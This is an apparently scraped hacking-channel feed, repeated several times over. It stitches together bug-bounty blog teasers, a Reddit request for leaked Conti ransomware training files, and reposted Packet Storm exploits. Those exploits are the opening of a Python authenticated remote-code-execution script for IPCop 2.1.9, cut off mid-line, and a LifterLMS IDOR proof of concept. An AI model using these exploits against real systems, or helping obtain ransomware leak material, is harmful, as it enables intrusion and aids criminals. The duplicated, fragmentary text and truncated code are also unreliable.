Apron Network Supports Polkadot Ecosystem With Node Service
https://apron-network.medium.com/apron-network-supports-polkadot-ecosystem-with-node-service-9a4eb9823b5b?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://apron-network.medium.com/apron-network-supports-polkadot-ecosystem-with-node-service-9a4eb9823b5b?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Apron Network Supports Polkadot Ecosystem With Node Service
As of Q2 2021, we have more than 400 projects built on the Polkadot ecosystem, this was to occur with progress in the development of the…
As of Q2 2021, we have more than 400 projects built on the Polkadot ecosystem, this was to occur with progress in the development of the…Continue reading on Medium » (https://apron-network.medium.com/apron-network-supports-polkadot-ecosystem-with-node-service-9a4eb9823b5b?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Apron Network Supports Polkadot Ecosystem With Node Service
As of Q2 2021, we have more than 400 projects built on the Polkadot ecosystem, this was to occur with progress in the development of the…
hacking: security in practice
Where can I find the HDD-drive Conti leak?
( Catch-up: a disgrunteled affiliate of the Conti ransomware gang leaked some training materials)
Does anyone know the forum or the exact files? Is there a torrent for them? I am positivley DYING to see them and I am planning on translating them from russian to english with a buddy of mine. I have scoured the entire web for them, looked at so many forums, but I still cant find them.
submitted by /u/StillPackage4369
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Where can I find the HDD-drive Conti leak?
( Catch-up: a disgrunteled affiliate of the Conti ransomware gang leaked some training materials)
Does anyone know the forum or the exact files? Is there a torrent for them? I am positivley DYING to see them and I am planning on translating them from russian to english with a buddy of mine. I have scoured the entire web for them, looked at so many forums, but I still cant find them.
submitted by /u/StillPackage4369
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Where can I find the HDD-drive Conti leak?
( Catch-up: a disgrunteled affiliate of the Conti ransomware gang leaked some training materials) Does anyone know the forum or the exact files?...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
FREE Practical Ethical Hacking course from The Cyber Mentor
submitted by /u/FragileEagle
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
FREE Practical Ethical Hacking course from The Cyber Mentor
submitted by /u/FragileEagle
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
FREE Practical Ethical Hacking course from The Cyber Mentor
Posted in r/hacking by u/FragileEagle • 1 point and 0 comments
Bug Hunting PhoenixRadioBali [ SQL Injection ]
https://medium.com/@joelaplnz/bug-hunting-phoenixradiobali-sql-injection-14b3fcad8391?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@joelaplnz/bug-hunting-phoenixradiobali-sql-injection-14b3fcad8391?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug Hunting PhoenixRadioBali [ SQL Injection ]
Helo semuanya, back lagi bersama saya, disini saya akan membahas kegiatan bug hunting yang saya lakukan beberapa hari belakangan ini pada…
Helo semuanya, back lagi bersama saya, disini saya akan membahas kegiatan bug hunting yang saya lakukan beberapa hari belakangan ini pada…Continue reading on Medium » (https://medium.com/@joelaplnz/bug-hunting-phoenixradiobali-sql-injection-14b3fcad8391?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug Hunting PhoenixRadioBali [ SQL Injection ]
Helo semuanya, back lagi bersama saya, disini saya akan membahas kegiatan bug hunting yang saya lakukan beberapa hari belakangan ini pada…
Fuzzing + IDOR = Admin TakeOver
https://medium.com/@gonzalocarrascosec/fuzzing-idor-admin-takeover-5343bb8f436e?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@gonzalocarrascosec/fuzzing-idor-admin-takeover-5343bb8f436e?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Fuzzing + IDOR = Admin TakeOver
Hello everyone, this is my first post. I’ve been thinking about writing about my findings for a while, so here we go.
Hello everyone, this is my first post. I’ve been thinking about writing about my findings for a while, so here we go.Continue reading on Medium » (https://medium.com/@gonzalocarrascosec/fuzzing-idor-admin-takeover-5343bb8f436e?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Fuzzing + IDOR = Admin TakeOver
Hello everyone, this is my first post. I’ve been thinking about writing about my findings for a while, so here we go.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
IPCop 2.1.9 Remote Code Execution
https://4.bp.blogspot.com/-AtnQ_7I3m3U/WWlvZV4J0qI/AAAAAAAAIOs/cujNKaH5r44v1_gHRqEIroH6JJl6WzjUACLcBGAs/s1600/h58.png
IPCop version 2.1.9 authenticated remote code execution exploit.
MD5 |
Download
# Exploit Title: IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/08/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipcop.org/
# Software Link: https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.8/ipcop-2.1.8-install-cd.i486.iso - https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.9/ipcop-2.1.9-update.i486.tgz.gpg
# Version: 2.1.9
# Tested on: parrot os 5.7.0-2parrot2-amd64
#!/usr/bin/python3
import requests as R
import os
import sys
import base64
import urllib3
R.packages.urllib3.disable_warnings()
R.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
R.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
# no pyopenssl support used / needed / available
pass
try:
hostport = sys.argv[1]
assert hostport[:8] == "https://" and hostport[-1] == "/"
url = hostport + "cgi-bin/email.cgi"
username = sys.argv[2].encode()
password = sys.argv[3].encode()
auth = base64.b64encode(username+b":"+password).decode()
command = sys.argv[4]
assert " " in command
except:
print("[-] Usage https://host:port/ username password command(no spaces)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
IPCop 2.1.9 Remote Code Execution
https://4.bp.blogspot.com/-AtnQ_7I3m3U/WWlvZV4J0qI/AAAAAAAAIOs/cujNKaH5r44v1_gHRqEIroH6JJl6WzjUACLcBGAs/s1600/h58.png
IPCop version 2.1.9 authenticated remote code execution exploit.
MD5 |
45746a48f3e976bd5c861e5e77a47282Download
# Exploit Title: IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/08/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipcop.org/
# Software Link: https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.8/ipcop-2.1.8-install-cd.i486.iso - https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.9/ipcop-2.1.9-update.i486.tgz.gpg
# Version: 2.1.9
# Tested on: parrot os 5.7.0-2parrot2-amd64
#!/usr/bin/python3
import requests as R
import os
import sys
import base64
import urllib3
R.packages.urllib3.disable_warnings()
R.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
R.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
# no pyopenssl support used / needed / available
pass
try:
hostport = sys.argv[1]
assert hostport[:8] == "https://" and hostport[-1] == "/"
url = hostport + "cgi-bin/email.cgi"
username = sys.argv[2].encode()
password = sys.argv[3].encode()
auth = base64.b64encode(username+b":"+password).decode()
command = sys.argv[4]
assert " " in command
except:
print("[-] Usage https://host:port/ username password command(no spaces)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
IPCop 2.1.9 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress LifterLMS 4.21.1 Insecure Direct Object Reference
https://3.bp.blogspot.com/-w74A7gxi0bY/WWlvD06cX8I/AAAAAAAAIK4/fcu0jWNFLhIrvrv6B2He7QdGvtDQ7X4rQCLcBGAs/s1600/h131.png
WordPress LifterLMS plugin version 4.21.1 suffers from an insecure direct object reference vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress LifterLMS 4.21.1 Insecure Direct Object Reference
https://3.bp.blogspot.com/-w74A7gxi0bY/WWlvD06cX8I/AAAAAAAAIK4/fcu0jWNFLhIrvrv6B2He7QdGvtDQ7X4rQCLcBGAs/s1600/h131.png
WordPress LifterLMS plugin version 4.21.1 suffers from an insecure direct object reference vulnerability.
MD5 |
0ece90c33c90c47103b0093d1ff1979aDownload
# Exploit Title: WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR
# Date: 2021-05-17
# Exploit Author: captain_hook
# Vendor Homepage: https://lifterlms.com
# Software Link: https://lifterlms.com
# Version: 4.21.1
# Tested on: any
Description
The plugin was affected by an IDOR issue, allowing students to see other student answers and grades
Proof of Concept
- Add 2 users with Student role for the scenario .
- Create A course With a quiz ( I picked True or Flase question for my quiz)
- Set Enrol on Free ( for the ease of scenario )
- Enrol into the Course with Student B and submit your answer to the Course .
The plugin will give a token like :
https://soft-dream.myliftersite.com/quiz/%d8%ac%d9%85%d8%b9-quiz/?attempt_key=wYK
To Check your answer was true or false.
Now Login as a Student A and Enroll in the Course. You can just use
the URL https://soft-dream.myliftersite.com/quiz/%d8%ac%d9%85%d8%b9-quiz/?attempt_key=wYK
and reach the Student B answer.
Fixed in version 4.21.2✓
References
https://make.lifterlms.com/2021/05/17/lifterlms-version-4-21-2/
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress LifterLMS 4.21.1 Insecure Direct Object Reference
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.